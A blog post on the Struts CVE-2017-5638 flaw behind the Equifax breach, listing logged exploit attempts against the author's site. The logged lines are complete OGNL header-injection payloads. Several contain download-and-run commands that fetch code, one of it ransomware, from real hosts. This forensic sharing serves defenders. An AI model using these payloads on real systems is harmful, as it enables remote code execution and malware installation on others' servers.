Equifax was compromised through Apache Struts (CVE-2017-5638); here are example attack attempts from my own logs

On 15 September 2017, Equifax stated their compromise happened through exploitation of a vulnerability in Apache Struts CVE-2017-5638 — published March 2017 when used in the wild — that involves a crafted Content-Type HTTP request header. For those interested, here are log rules of 28 (untargeted) requests that attempted to exploit this vulnerability on my own blog (which does not run Apache Struts) between 10 March 2017 and 14 September 2017.

The lines are quite long; scroll to right in the grey dialog below. Each line contains a single “#cmd=” that defines a command and a single “#cmds=” (I highlighted those parts in bold below) that feeds the command to cmd.exe on Windows systems and /bin/bash on non-Windows systems. 12 of 28 cases attempt to download & run code; the remaining 16 cases only execute echo “Struts2045” or echo “Amen4Wolves” and seem to be probes for vulnerability. In (only) one case the payload could still be accessed: hxxp://82.165.129.119/UnInstall.exe, which contains Cerber ransomware. So, this was an attempt to distribute ransomware by exploiting CVE-2017-5638; the source was 220.191.231.222, registered to ‘Jinhua Electronic Government Network’.

blog.cyberwar.nl-forensic.log:+25030:58c2e12a:40|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/.jb %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/.jb ; fetch http%3a//65.254.63.20/.jb ; perl .jb ;rm -rf .jb*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+18708:58ce3b02:5f|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+25980:58d00e81:14|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+5491:58d2431c:10|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='cmd.exe /c echo open 82.165.129.119 21 >> ik &echo user anonymous anonymous>> ik &echo binary >> ik &echo get 1.exe >> ik &echo bye >> ik &ftp -n -v -s%3aik &del ik &1.exe &exit').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+5481:58d2431c:21|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/a%7csh ; rm -rf a ; curl -O http%3a//65.254.63.20/a ; sh a ').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+4485:58d2431c:34|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='BITSAdmin.exe /Transfer JOB http%3a//82.165.129.119/UnInstall.exe %25TEMP%25/UnInstall.exe & %25TEMP%25/UnInstall.exe').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+13314:58d45e97:54|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+4017:58ebf9b6:46|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14242:58f02f0c:f9|GET / HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+16047:58f02f12:9|GET /login/ HTTP/1.1|Accept-Encoding:identity|Host:149.210.129.7|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+15024:58f02f14:b2|GET /wp-login.php HTTP/1.1|Accept-Encoding:identity|Host:blog.cyberwar.nl|Content-type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget -qO - http%3a//65.254.63.20/oz %7c perl ; cd /tmp ; curl -O http%3a//65.254.63.20/oz ; fetch http%3a//65.254.63.20/oz ; perl oz ;rm -rf oz*').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Connection:close|User-agent:Mozilla/5.0
blog.cyberwar.nl-forensic.log:+6171:590e8bf2:64|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+21732:59233fb2:7|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 185.159.82.142/10 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+26909:5924b39c:2d|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+14205:592ab9f1:d8|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15355:592ab9f1:16|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+15448:592ab9f1:4|GET / HTTP/1.1|Host:blog.cyberwar.nl|User-Agent:Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36|Content-Type:%25{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='wget 188.138.105.88/18 &> /dev/null').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Referer:http%3a//149.210.129.7|Accept-Encoding:gzip
blog.cyberwar.nl-forensic.log:+12791:59359766:28|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+23218:5940ef00:180|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//blog.cyberwar.nl/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+26725:5949c3cb:58|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+6599:597b4f8e:d9|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+18295:597ef9c9:1e|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
blog.cyberwar.nl-forensic.log:+24880:5980d5ad:0|GET / HTTP/1.1|Connection:Keep-Alive|Content-Type:%25{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm)%3a((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}%3a{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}|Accept:*/*|Accept-Language:zh-cn|Referer:http%3a//149.210.129.7%3a80/|User-Agent:Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)|Host:blog.cyberwar.nl
